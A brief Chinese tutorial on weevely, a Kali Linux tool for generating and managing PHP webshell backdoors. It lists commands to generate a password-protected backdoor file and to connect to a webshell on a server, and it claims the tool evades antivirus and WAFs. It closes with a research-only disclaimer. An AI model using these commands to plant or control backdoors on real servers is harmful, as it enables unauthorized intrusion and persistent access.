Kali上的php后门生成&管理工具–weevely
一、工具简介
weevely是一款Kali下使用python编写的webshell管理工具,可以当作是linux下的一款菜刀的替代工具(仅限于php)。使用weevely生成的木马免杀能力较强,而且使用加密连接,往往能轻松突破WAF拦截。
二、简单使用
终端输入weevely启动,可以看到帮助说明
使用说明:
连接一句话木马 weevely <URL> <password> [cmd]
如:weevely http://www.xxx.com/test.php test test为连接密码加载session文件 weevely session <path> [cmd]
用来连接曾经连接过的会话生成后门代理: weevely generate <password> <path>
如:weevely generate test /root/Desktop/test.php 桌面生成php后门,连接密码为test
另外还可以生成*.img、*.htaccess,但需要服务器开启.htaccess。
友情提醒:该教程仅用于渗透研究,切勿进行非法测试